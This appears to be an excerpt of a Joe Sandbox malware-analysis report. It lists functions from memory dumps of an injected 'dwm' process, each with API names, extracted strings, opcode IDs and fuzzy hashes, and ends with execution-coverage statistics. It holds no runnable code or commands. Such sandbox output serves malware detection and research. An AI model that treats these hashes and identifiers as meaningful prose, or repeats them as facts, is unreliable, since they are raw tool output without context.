                                                          Function 00000210918E36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                          • Instruction ID: 31151227df1d0a64791e71fb235f37a9ef2549f32b87cd0adfc1e277743ca602
                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                          • Instruction Fuzzy Hash: 19016174311B4082EB249B11E8AC79733B0BB68FA1F540524CD490B756EFBDCD859740
                                                          Function 00000210918E8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                          • Instruction ID: d5fceadb3ac314e8130b6b3c9fe5c2e612ae0d776d3e917a8ae2a64f53c260bd
                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                          • Instruction Fuzzy Hash: 9851A432B01A0086DB14EB15E49CB9E3795F364FA4F518918DE164B74AEBF9CCC1D740
                                                          Function 00000210918E1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                          • Instruction ID: ac7a3c4b05e79ed727a9ccb6099161d509df89685ac197c967e1ce06a8fdc935
                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                          • Instruction Fuzzy Hash: A5F0367230464191E7709B11E8E879A6760F758FE4FD44120DA4A4A655DEBCCACED700
                                                          Function 00000210918EBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                          • Instruction ID: 0747b42462547eddb0ad64c47c68f27c960b31db132a41d3eb2df2047276f7c1
                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                          • Instruction Fuzzy Hash: 74F0627131560581FB109B24E4AC39B7360EBA5F71FA40319CA6A4D3E6DFBCC8C6A380
                                                          Function 00000210918E3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                          • Instruction ID: 8c28c4286e75e1d9c0d3132ef7b0f00c4dfed659432bfe3694ea357ef32985fe
                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                          • Instruction Fuzzy Hash: 9BF08270704B8082EA009B53B9AC19B6660EB58FE0F544230EE460BB1ADF7CCCC69740
                                                          Function 00000210918E5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                          • Instruction ID: 4844807503bb80d3ea280119b49193c389feed37f88fce6d81a8479ba847d116
                                                          • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                          • Instruction Fuzzy Hash: 3961D036619B44C6E760DB15E4A835B77E0F399BA4F100115FA8E47BA9DBBCC990DF00
                                                          Function 0000021091D03504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665347309.0000021091CF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091CF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_21091cf0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: af50df25b878255036db3d258d7ffa8c1e98b4ac390375eb5dea2ab460f33c9a
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 0F11A732711E513AFA543629E4FD3E91190AF7CB74F884628A966762F7CAF5DCC14104
                                                          Function 00000210918F4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 01e8cc9fedd6d1fb93ea2a99213397d84e6d8d7dab94d2c46d89bcb48cc05f5e
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 7E119132B10E5411F766156AD4FD3E711406B78BB8F280626A9760E7D78BF4CCC7A280
                                                          Function 0000021091CFF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665347309.0000021091CF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091CF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_21091cf0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                          • API String ID: 3215553584-4202648911
                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                          • Instruction ID: 489766e4e7f46fb0ef21e57b30f141e9ed5ab18472741c578519cf5ede39168c
                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                          • Instruction Fuzzy Hash: 6561C5B77002C842FA699B65D5FC3EA26A2E766F60F558515C90A037A7DBF4CCC78300
                                                          Function 00000210918EAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction ID: 02bc0b5b4f8bfebd2b7991382326a478560439ca9e05d29bd3615ada5ef2f525
                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction Fuzzy Hash: 84616B32B00B449AEB10EF65D4943DE77A0F364F98F044615EF4A1BB9ADBB8C995D700
                                                          Function 0000021091CFA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665347309.0000021091CF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091CF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_21091cf0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction ID: 9d7f1460f140a4094ab9c86a21dd79fddebcf5715d82b53c1fcc402f972237a9
                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction Fuzzy Hash: 235195B63002C8CAEB748F5595A83D8B7A2F365FA4F144115DA49877D7CBB8D8D6C700
                                                          Function 00000210918EAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction ID: 6b47f550437c4f3c5d4a9277bcc593f7415c96762da76255d11eb459e45b68c2
                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction Fuzzy Hash: 1F5180723043809AEB74AF2594E83DA77A0F364FA5F184115DA5A4BBD6CBB8DCD0E700
                                                          Function 0000021091CF8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665347309.0000021091CF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091CF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_21091cf0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 3242871069-629598281
                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction ID: 6b17c5b82c5c2be4c814a933089f46fa2933141aa2f3ef4262273c918734c5bf
                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction Fuzzy Hash: EE51C1B27016848BEB14DF15E5ACB983796F364FA8F518124DE066778EEBB4CDC28704
                                                          Function 0000021091CF83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665347309.0000021091CF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091CF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_21091cf0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 3242871069-629598281
                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction ID: 0c472922a39a3da1be5439812881a68b82e8b0da71d59f7f0f87e836ed020cea
                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction Fuzzy Hash: 3531A1B130168497E714EF11E9AC7993B65F364FA8F158014EE571378ADBB8CD82C704
                                                          Function 00000210918F2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                          • Instruction ID: c8e8b92364744a3089fcfd6d7cce2683be113ece760c8601cfe0f6dc2b39f2ec
                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                          • Instruction Fuzzy Hash: 73D12632714A8089E711CF79D4943DD3BB2F364BA8F504215CE5D9BB9ADAB4C887D780
                                                          Function 00000210918E14A4 Relevance: 6.3, APIs: 5, Instructions: 39memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: 23e5596e6afe4154b2baf6c6de4ac956f245c11af45a2c6a236834124d1c642c
                                                          • Instruction ID: fc340be630a14512906a35be98401336f9b3dce03082a265785862574e71d800
                                                          • Opcode Fuzzy Hash: 23e5596e6afe4154b2baf6c6de4ac956f245c11af45a2c6a236834124d1c642c
                                                          • Instruction Fuzzy Hash: EA018072700E90D6E704DF66E89818A63A1F758F95F644124DB4A47716DE74C8D2D780
                                                          Function 00000210918F2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                          • Instruction ID: b5f287c6de3aca28887fcbbdd921397b801078b33109c8407494c80297b26cf9
                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                          • Instruction Fuzzy Hash: 6491D23270065485F7609F6594E83EE3BA2B764FA8F944109DE0A5B786DBB4CCC7E780
                                                          Function 00000210918E7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                          • Instruction ID: 7d7b4896754e5b041d00747c65a4f1eb5bd4c500c8323e8b7c92bb39a90c3c27
                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                          • Instruction Fuzzy Hash: 10113032710F0189EB00DF60E8A83E933B4F769B68F440E21DA6D467A5DFB8C5D99380
                                                          Function 00000210918E253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                          • Instruction ID: 466780ea0ba2e314ac49bb2e3d61716750621a59706e5581811632016c60716d
                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                          • Instruction Fuzzy Hash: 9071D43630078185E724EF259CE83EB6795F3A9FA4F540116DD0A4BB8ADFB4CD859700
                                                          Function 0000021091CF9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665347309.0000021091CF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091CF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_21091cf0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction ID: 1dea0b1afe69e15f0783a6c70759d28f89e266065e37f44f62640ec1cc083e4e
                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction Fuzzy Hash: 3761AD73700B888AEB20DF65D4943DD77A2F358BA8F044215EF4917B9ADBB8D996C700
                                                          Function 00000210918E2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                          • Instruction ID: f5bd8a4a339542e42ef03e5f9157fdae8b7a35c68540ccb6e1622006d5e9ded3
                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                          • Instruction Fuzzy Hash: EA51D33230478181E664EA29A1FC3FB6762F3A5F64F440125DE5A0BB4BCAB9CD85A740
                                                          Function 00000210918F26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                          • Instruction ID: e023c16c59aa66c5db1cdd815ed629b6c42e663f7879da10f26e5cf6b9d450c5
                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                          • Instruction Fuzzy Hash: 7D41DB72314B8081DB10DF25E4983DA77A1F7A8BA4F904121EE4D8B795DB7CC882D780
                                                          Function 00000210918E94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                          • Instruction ID: 71d73a99575850c525a499bcca749610c6142d42be6a53bd79ab4ac317a7ab95
                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                          • Instruction Fuzzy Hash: B1115B32604B8082EB208B15E49439A77E4F798FA4F584660EE8C0B759DFBCC991CB00
                                                          Function 0000021091CF7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665347309.0000021091CF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091CF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_21091cf0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                          • API String ID: 592178966-758928094
                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                          • Instruction ID: 3d5a64bbb56117a1a0acd8f6555995317c00d75f18f8cc5d64e15406bcc68e3f
                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                          • Instruction Fuzzy Hash: 47E08671741B4890DF019F21E8942D873A1DB6DF74F4891229D5C06312FA78D5F9C300
                                                          Function 0000021091CF73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665347309.0000021091CF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091CF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_21091cf0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: Locator'$riptor at (
                                                          • API String ID: 592178966-4215709766
                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                          • Instruction ID: 9351414ee55a91551c0c54f0202ac4bd5ca46dd876d2d198584a9ca9dea59a7b
                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                          • Instruction Fuzzy Hash: ACE08671701B4880DF019F21E4942D87361E76DF64F889122DD4C06312EA78D5E9C300
                                                          Function 00000210918E1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                          • Instruction ID: 31364e4a965dbe0d6af72a1fa2eb7f0b04a5503146bbbc22e9416303b5c78ec3
                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                          • Instruction Fuzzy Hash: 4911B235701B4481EB04DB66A4982AA73A0F798FE0F584124DE4E8B766DFB8C8D2E340
                                                          Function 00000210918E1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                          • Instruction ID: bf7d94cf8aeac0024fdcd426d9e53e0ad0f82279aeebc24660c854ce464d7eb0
                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                          • Instruction Fuzzy Hash: 65E09B75701A0486E7058F52D85C38B36E1FB9DF15F54C114C9090B352EFBE88D6D790

                                                          Execution Graph

                                                          Execution Coverage:0.7%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:66
                                                          Total number of Limit Nodes:2
